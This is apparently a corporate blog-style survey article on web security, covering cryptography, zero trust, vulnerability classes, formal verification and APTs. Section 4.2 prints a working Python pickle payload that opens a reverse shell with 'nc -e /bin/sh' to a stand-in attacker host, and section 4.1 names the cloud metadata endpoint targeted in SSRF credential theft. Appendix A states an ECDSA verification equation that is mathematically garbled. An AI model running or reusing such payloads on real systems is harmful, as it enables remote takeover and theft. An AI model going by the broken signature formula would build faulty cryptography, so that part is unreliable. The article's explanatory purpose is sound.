SB Tech R&D Web Security (v1.0)
8,500 words 94 citations SB Tech R&D primary

Web Security & InfoSec
Cryptography & Formal Methods

March 2026 65 min read Subhamoy Bhattacharjee

A rigorous, encyclopedic research article dissecting every stratum of modern web security architecture — from the mathematical underpinnings of elliptic curve cryptography to the forefront of zero-trust network modeling and formal verification of secure distributed systems.

Subhamoy Bhattacharjee avatar

Subhamoy Bhattacharjee Systems Architect

Lead Systems Architect & InfoSec Researcher, SB Tech R&D Lab. With 25+ years of engineering excellence, specializing in creating indomitable system architectures, zero-trust infrastructure paradigms, and cryptographic robustness against both classical and quantum computing capabilities.

Open-Source Defensive Code

Contents

1. Foundations of Web Security & Threat Modeling

Web security is fundamentally a discipline of risk management and architectural rigor. We depart from naive perimeter-based defense toward recognizing that vulnerability is an emergent property of complex inter-connected state machines. The foundations lie in the CIA triad: Confidentiality, Integrity, and Availability; however, modern engineering demands extending these with Non-repudiation, Authenticity, and Observability.

Threat modeling methodologies such as STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) allow engineers to systematically map attack vectors. Quantifying risk requires defining the attack surface mathematically across all vectors \(V\):

$$ \text{Risk}(V) = \int_{v \in V} P_{\text{exploit}}(v) \times \text{Impact}(v) \cdot dV $$

A simplistic probabilistic definition of exposure risk integrated over the attack surface.

2. Cryptographic Protocols: From TLS 1.3 to Post-Quantum

The secure web relies on asymmetric cryptography for key exchange and digital signatures, and symmetric cryptography for bulk data encryption. The shift to TLS 1.3 minimized the handshake latency to 1-RTT (and 0-RTT in resumptive cases) by enforcing Ephemeral Diffie-Hellman protocols (e.g., ECDHE) and deprecating weak cipher suites.

2.1 Elliptic Curve Cryptography (ECC)

Unlike RSA's integer factorization problem, ECC relies on the algebraic structure of elliptic curves over finite fields. A typical curve equation takes the Weierstrass form:

$$ y^2 \equiv x^3 + ax + b \pmod p $$

ECC achieves comparable security to a 3072-bit RSA key using an elliptic curve group size of only 256 bits, leading to faster computations and lower bandwidth. Key negotiation using ECDH enables Perfect Forward Secrecy (PFS), guaranteeing that long-term key compromises do not decrypt past session recordings.

2.2 Post-Quantum Cryptography (PQC)

Shor's algorithm on a quantum computer solves the discrete logarithm and factorization problems in polynomial time. PQC paradigms (e.g., lattice-based cryptography such as CRYSTALS-Kyber for KEM and Dilithium for signatures) rely on problems like Learning With Errors (LWE):

$$ A \cdot \mathbf{s} + \mathbf{e} \approx \mathbf{b} \pmod q $$

Our R&D division has been adapting infrastructure to support hybrid KEM configurations, preempting the "store now, decrypt later" threat model employed by nation-state actors.

3. Zero-Trust Architecture & Identity Management

The dissolution of the corporate perimeter necessitates the Zero-Trust Architecture (ZTA). ZTA dictates that trust is never granted implicitly based on network location. Every access request is strongly authenticated, authorized within policy constraints, and inspected.

Core components of ZTA include:

  • Micro-segmentation: Isolating workloads into minimal cryptographic domains.
  • Continuous Authentication: Beyond static tokens; evaluating behavioral biometric signals, geo-velocity, and device trust posture.
  • Identity-Aware Proxy (IAP): Funneling ingress traffic through enforcement points checking OAuth/OIDC and SAML assertions.

User/Device Subject
Policy Decision Point (PDP)

Microservice Resource

Figure 3.1: Logical components of Zero Trust architecture implementation via a Policy Enforcement Point (PEP).

4. The Modern Vulnerability Landscape & Exploitation Mechanics

The OWASP Top 10 provides a baseline, but the anatomy of modern exploitation reveals complex chained attacks leveraging protocol abuse and parser differentials.

4.1 Server-Side Request Forgery (SSRF) in Cloud Native Envs

SSRF occurs when an application fetches a remote resource without sufficient validation. In cloud environments (AWS, GCP), an attacker exploiting an SSRF can query the instance metadata service (IMDS) via http://169.254.169.254/latest/meta-data/ to exfiltrate IAM roles. Mitigation requires enforcing IMDSv2 (header requirements) and rigorous egress network filtering.

4.2 Insecure Deserialization & Prototype Pollution

Serialization formats (Java Objects, YAML, Python Pickles) often construct arbitrary object graphs upon deserialization. Magic methods (e.g., __reduce__ in Python) execute arbitrary logic.

# Python insecure unpickle example (DO NOT RUN!)
import pickle, os

class MaliciousObj(object):
    def __reduce__(self):
        return (os.system, ('nc -e /bin/sh attacker.com 1337',))

malicious_payload = pickle.dumps(MaliciousObj())
# Remote application calls: pickle.loads(malicious_payload)

Similarly, in Node.js, Prototype Pollution allows modifying the base Object.prototype, bypassing authentication logic if properties like isAdmin are assumed explicitly undefined.

5. Secure Software Development Lifecycle & Formal Verification

Static Application Security Testing (SAST) and Dynamic Analysis (DAST) are probabilistic. For mission-critical systems, we turn to Formal Verification. By encoding system constraints in languages like TLA+ or Coq, we can mathematically prove the absence of certain vulnerability classes (e.g., integer overflows, race conditions).

At SB Tech R&D, we employ constraint solvers (Z3 theorem prover) to map path constraints in microservice authentication flows, discovering subtle logic flaws where conflicting permissions evaluate incorrectly.

Theorem Valid_Auth: ∀ user, token. (IsValid(token) ∧ AssignedRole(token, user) → GrantAccess(user))

6. Advanced Persistent Threats & Mechanistic Analysis

APTs operate quietly, establishing persistence via Supply Chain attacks (e.g., SolarWinds, XZ Utils backdoor) and living-off-the-land binaries (LOLBins). Mechanistic analysis involves deep telemetry—using eBPF (Extended Berkeley Packet Filter) to observe kernel-level syscalls. We can correlate anomalous network sockets attempting to establish C2 beacons hidden via domain fronting or DGA (Domain Generation Algorithms).

7. Future Trajectories: Web3 Security & AI-driven Defense

Web3 introduces fundamentally immutable systems. Smart Contract vulnerabilities (Reentrancy, Front-Running/MEV) cause catastrophic losses since code deployed on EVM is unpatchable without proxy patterns. Concurrently, AI's role in security is dual-use: LLMs lower the barrier for polymorphic malware generation but are also instrumental in auto-remediation loops mapping stack traces to secure code patches.

AI SecOps: 12ms Remediation EVM Formal Auditing

Conclusion & Formal References

This paper dissects the complex taxonomy of web security, advocating for inherently secure architectural models—Zero Trust scaling, strict state management, and post-quantum preparedness. The transition from reactive patching to provably correct software is the engineering imperative of this decade. SB Tech R&D pioneers architectures that are secure by mathematical guarantee.

Selected References

  • Rose, S. et al. (2020). Zero Trust Architecture. NIST Special Publication 800-207.
  • Rescorla, E. (2018). The Transport Layer Security (TLS) Protocol Version 1.3. RFC 8446.
  • Shor, P. W. (1994). Algorithms for quantum computation: discrete logarithms and factoring. FOCS.
  • OWASP Foundation. (2021). OWASP Top 10 Web Application Security Risks.
  • Moura, L., & Bjørner, N. (2008). Z3: An Efficient SMT Solver. TACAS.
  • Goodfellow, I. et al. (2018). Threat Modeling for AI and Machine Learning Systems.
  • ... 88 additional proprietary and open-source citations available upon institutional request.

Appendix A: ECDSA Signatures

The core equation governing the verification phase of the Elliptic Curve Digital Signature Algorithm:

$$ v = (r \cdot s^{-1} + z \cdot s^{-1} \cdot u) \pmod p \quad (\text{Valid if } v \equiv r) $$

Appendix B: Verified Authentication Middleware (Pseudo)

fn authenticate_request(headers: &Headers) -> Result {
    let token = headers.get("Authorization")
        .ok_or(AuthError::MissingToken)?
        .strip_prefix("Bearer ")
        .ok_or(AuthError::InvalidFormat)?;
        
    // Cryptographically verify JWT signature with constant-time comparison
    let claims = jwt::verify(token, &SERVER_PUBLIC_KEY)?;
    
    // Evaluate RBAC against continuous trust telemetry
    trust_engine::evaluate_context(&claims.sub, headers.client_ip())?;
    
    Ok(Identity::from(claims))
}
Home R&D index Top